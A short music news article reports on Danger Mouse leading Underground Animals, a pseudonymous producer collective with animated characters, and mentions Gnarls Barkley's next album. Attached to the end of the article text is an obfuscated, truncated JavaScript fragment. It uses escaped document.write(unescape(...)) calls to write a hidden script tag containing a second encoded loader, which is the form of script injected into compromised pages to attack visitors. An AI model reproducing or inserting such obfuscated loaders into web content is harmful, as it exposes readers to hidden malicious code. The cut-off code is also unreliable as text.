Quite possibly the hardest working man in pop, Danger Mouse, has announced details of a new musical project.
The Gnarls Barkley star will head a collective of producers called Underground Animals who will all contribute to a new compilation album on Downtown/Atlantic records.
Paralleling the Gorillaz, all members of the group will be brought to life through animated characters.
Speaking to billboard, Downtown label head Josh Deutsch explains: We have some very celebrated producers and some up-and-comers, all of whom are arranged around Danger. Everybody is producing under a pseudonym."
He continued: "There will be an element of mystery about it - certain producers will be retired. And many of these people are some of the most famous producers out there.
"It will allow them to produce the kinds of records they wouldn't necessarily want to do without the benefit of a pseudonym. We've already had a really A-list rock guy wanting to do a hip-hop record."
Gnarls Barkley are currently working on the follow up to 'St Elsewhere' which may be out before the end of 2007.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
